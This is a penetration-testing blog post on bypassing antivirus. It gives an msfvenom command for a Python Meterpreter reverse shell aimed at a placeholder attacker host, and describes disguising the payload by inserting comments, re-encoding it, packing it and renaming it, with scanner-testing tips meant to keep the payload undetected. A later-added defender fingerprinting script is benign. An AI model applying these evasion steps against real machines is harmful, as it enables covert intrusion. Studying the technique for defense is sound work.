When it comes to securing a system, especially a Windows machine, people often rely on antivirus alone. Most people assume that having an antivirus installed is enough to protect their machines from malicious programs and cybercriminals. It is true that antivirus programs are getting smarter every day and that antivirus vendors work hard to improve detection rates and reduce false positives. The same applies to the cybercriminals: every day the internet is flooded with tutorials that explain how to evade antivirus programs. Some methods involve advanced techniques such as changing the behavior of the payloads and encrypting them, while others require nothing more than running a few simple tools. Let us explore one of the simplest methods that can bypass popular antivirus products such as McAfee, Kaspersky and others.
A couple of months back we conducted a penetration testing activity on a Windows machine. The machine was running Windows 10 and was hosted in a Citrix environment. For starters, we were provided with a least-privilege user account. After doing some reconnaissance and exploring a couple of options, we zeroed in on sending a payload to the target machine that would give us a Meterpreter session. This Meterpreter session would make our job easier for post-exploitation. However, to achieve this we needed to ensure that our payload did not get detected by the antivirus. Owing to stringent time constraints, we placed our bets on a simple workaround, which allowed us to bypass the antivirus within a matter of minutes.
We quickly popped open our Linux terminal and ran msfvenom (msfvenom is the payload generator and encoder developed by the awesome folks at Offensive Security, the same people who created Kali Linux) and created a simple Python payload using the following command:
msfvenom -p python/meterpreter/reverse_tcp LHOST=<attacker_IP> LPORT=<attacker_port> R > name_of_the_payload.py
Here -p specifies the payload type, LHOST is my attacking machine and LPORT is the listening port on my machine.
Now let's look at the source code of this payload.
As we can see, it is base64 encoded, so we decoded it to get the code snippet below:
This is straightforward code, so any antivirus (including Windows Defender ;-)) will detect it. So let us modify the code so that its signature becomes unique and it can be greenlit by the scan. All we need to do is insert some comments into the Python code, as illustrated below.
After inserting comments, encode the code to base64 again.
Now, using py2exe or pyinstaller, we can create an executable from the payload with the command below.
This command creates a single file that contains all the required runtime components. The payload is saved under /root/dist/.
Now rename the file to something that looks like a normal file. We renamed it "niceprogram" in our case.
Now let us upload it to an online scanner to test whether any antivirus is able to detect our malicious payload. Usually we use nodistribute.com for this job, as they do not share their scan results. For this test, we scanned our payload with virustotal.com.
Note: please don't use virustotal.com to test your payloads. They share the results with antivirus vendors, so your payload's signature will be stored and in future it will be detected by every antivirus (remember, that is why we are changing the signature of the file ;-)).
Now it is time to get the result…
As you can see, the simple generic malware we generated has now (almost) successfully bypassed almost all antivirus engines and is flagged as clean. For demo purposes the payload was intentionally made to fail at least one scan; otherwise we could make it 100% undetectable by any antivirus by inserting more comments into our original payload.
As I already mentioned, there are many advanced techniques to do this which work very effectively in real-world scenarios. All we need is enough time and resources.
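The trick works because a raw file hash changes as soon as a comment is inserted. A defender-side counterpart, added here and not part of the original post, fingerprints the Python source from its token stream with comments removed, and also decodes the long base64 literal of an exec() stager so the inner script gets the same treatment. The samples are constructed and benign; `wrap`, the `B64_LITERAL` regex and its 16-character threshold are assumptions of this example.

```python
import base64
import hashlib
import io
import re
import tokenize

# Long base64 string literals are candidates for a wrapped inner layer (16 is an assumed threshold).
B64_LITERAL = re.compile(r"""["']([A-Za-z0-9+/]{16,}={0,2})["']""")

def normalize_python(src: str) -> str:
    """Rebuild the source from its tokens, dropping comments and blank lines,
    so that inserting comments leaves the result unchanged."""
    keep = []
    for tok in tokenize.generate_tokens(io.StringIO(src).readline):
        if tok.type in (tokenize.COMMENT, tokenize.NL, tokenize.ENDMARKER):
            continue
        keep.append(tok.string.strip() or "\n")  # NEWLINE/INDENT/DEDENT become a line break
    return " ".join(keep)

def fingerprint(src: str) -> str:
    """SHA-256 over the normalized token stream rather than the raw file bytes."""
    return hashlib.sha256(normalize_python(src).encode()).hexdigest()

def decoded_layers(src: str) -> list[str]:
    """Every long base64 literal in src that decodes to UTF-8 text, i.e. the inner
    script of a base64-wrapped exec() stager; undecodable literals are skipped."""
    layers = []
    for lit in B64_LITERAL.findall(src):
        try:
            layers.append(base64.b64decode(lit, validate=True).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue
    return layers

def fingerprints(src: str) -> list[str]:
    """Outer fingerprint first, then one per decoded inner layer."""
    return [fingerprint(src)] + [fingerprint(inner) for inner in decoded_layers(src)]

# Constructed, benign samples shaped like the post's stager: an inner script, base64-wrapped, handed to exec().
INNER = "import sys\nprint('hello from the inner layer')\n"
INNER_COMMENTED = "import sys  # inserted comment\n# another one\nprint('hello from the inner layer')\n"

def wrap(inner: str) -> str:  # test-fixture builder, an assumption of this example
    return f"import base64,sys;exec(base64.b64decode('{base64.b64encode(inner.encode()).decode()}'))\n"

STAGER = wrap(INNER)
STAGER_OUTER_COMMENTS = "# padding\n" + STAGER + "# more padding\n"
STAGER_INNER_COMMENTS = wrap(INNER_COMMENTED)
```

Comments added around the outer stager leave the outer fingerprint unchanged, while comments inside the inner script change the base64 literal entirely, which is why the inner layer has to be decoded before its fingerprint matches again.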
• If you are a system owner, consider hardening the system and configuring the IDS/IPS or any other protection mechanism properly. Create awareness among users because, as they say, "Your security is only as strong as the weakest link, and the weakest link in the security chain is humans".
• If you are a pentester, there are many other simple ways to create undetectable backdoor payloads. Utilize them and concentrate more on post-exploitation. Remember, the true challenge comes in post-exploitation.
• If you are a user, think twice before clicking on unknown links and files. Never depend on antivirus alone, because it can be easily bypassed as we illustrated above.
Authored By - Surya Prasanth
TCS Cyber Security Practice